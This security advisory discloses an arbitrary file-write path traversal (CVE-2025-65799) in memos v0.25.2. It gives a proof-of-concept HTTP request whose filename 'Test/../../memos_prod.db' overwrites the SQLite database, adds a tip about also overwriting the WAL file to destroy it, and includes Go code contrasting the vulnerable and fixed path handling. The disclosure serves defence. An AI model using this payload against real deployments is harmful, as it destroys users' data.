usd-2025-56 | Arbitrary File Write via Path Traversal in memos
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-23: Relative Path Traversal
Security Risk: High
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65799
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65799
Advisory ID: usd-2025-56
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
When local storage is used for attachments, client-supplied filenames are neither validated nor sanitized, allowing path traversal. An authenticated, low-privileged attacker can therefore overwrite arbitrary files writable by the memos process with content of their choosing. For example, if SQLite is used as the database backend, an attacker can corrupt the database.
Proof of Concept
The following HTTP request uses the REST API to demonstrate the vulnerability.
POST /api/v1/attachments HTTP/1.1
Host: memos:5230
Content-Type: application/json
Cookie: user_session=[... REDACTED ...]
Content-Length: 59

{
  "filename":"Test/../../memos_prod.db",
  "type":"image/png"
}
Note that to fully destroy the database, the memos_prod.db-wal file (the SQLite write-ahead log) must be overwritten as well.
Fix
A fix for the vulnerability has been submitted as a pull request.
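To illustrate the class of defect and the kind of check a fix needs, the following Go snippet (an added example written for this advisory, not code from the memos project or from the submitted pull request) places the vulnerable pattern next to a hardened one. The storage root, function names and the sample filenames are assumptions; only the traversal payload is taken from the proof of concept above.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrUnsafeFilename is returned when a client-supplied filename could escape
// the attachment directory.
var ErrUnsafeFilename = errors.New("unsafe attachment filename")

// unsafeAttachmentPath mirrors the vulnerable pattern: the client-supplied
// filename is joined onto the storage directory without any validation.
// filepath.Join cleans the result, so "Test/../../memos_prod.db" silently
// resolves to a file two levels above the attachment directory.
func unsafeAttachmentPath(baseDir, filename string) string {
	return filepath.Join(baseDir, filename)
}

// safeAttachmentPath accepts only a bare file name and then verifies that the
// resulting path still lies inside baseDir.
func safeAttachmentPath(baseDir, filename string) (string, error) {
	// Reject empty names, relative components, NUL bytes and separators of
	// either flavour (backslashes matter when the server runs on Windows).
	if filename == "" || filename == "." || filename == ".." ||
		strings.ContainsAny(filename, `/\`) || strings.Contains(filename, "\x00") {
		return "", ErrUnsafeFilename
	}
	// A name that changes under Base carried path structure of some kind.
	if filepath.Base(filename) != filename {
		return "", ErrUnsafeFilename
	}
	base, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	full := filepath.Join(base, filename)
	// Belt and braces: the joined path must remain inside the storage root.
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrUnsafeFilename
	}
	return full, nil
}

func main() {
	// Assumed storage root for the demonstration, not the project's real default.
	const baseDir = "/var/opt/memos/attachments"
	// Constructed sample filenames: one benign, the advisory's payload, and two edge cases.
	for _, name := range []string{"photo.png", "Test/../../memos_prod.db", "..", "note.txt\x00.png"} {
		fmt.Printf("unsafe: %-28q -> %s\n", name, unsafeAttachmentPath(baseDir, name))
		if p, err := safeAttachmentPath(baseDir, name); err != nil {
			fmt.Printf("safe:   %-28q -> rejected (%v)\n", name, err)
		} else {
			fmt.Printf("safe:   %-28q -> %s\n", name, p)
		}
	}
}
```

The name check alone would stop the request shown above; the trailing filepath.Rel containment test is kept so that the rule "the final path must be inside the storage root" is enforced regardless of how the name is later transformed or where the storage root is configured.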
References
Timeline
- 2025-11-03: First contact request
- 2025-11-03: Pull request submitted
- 2025-11-05: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.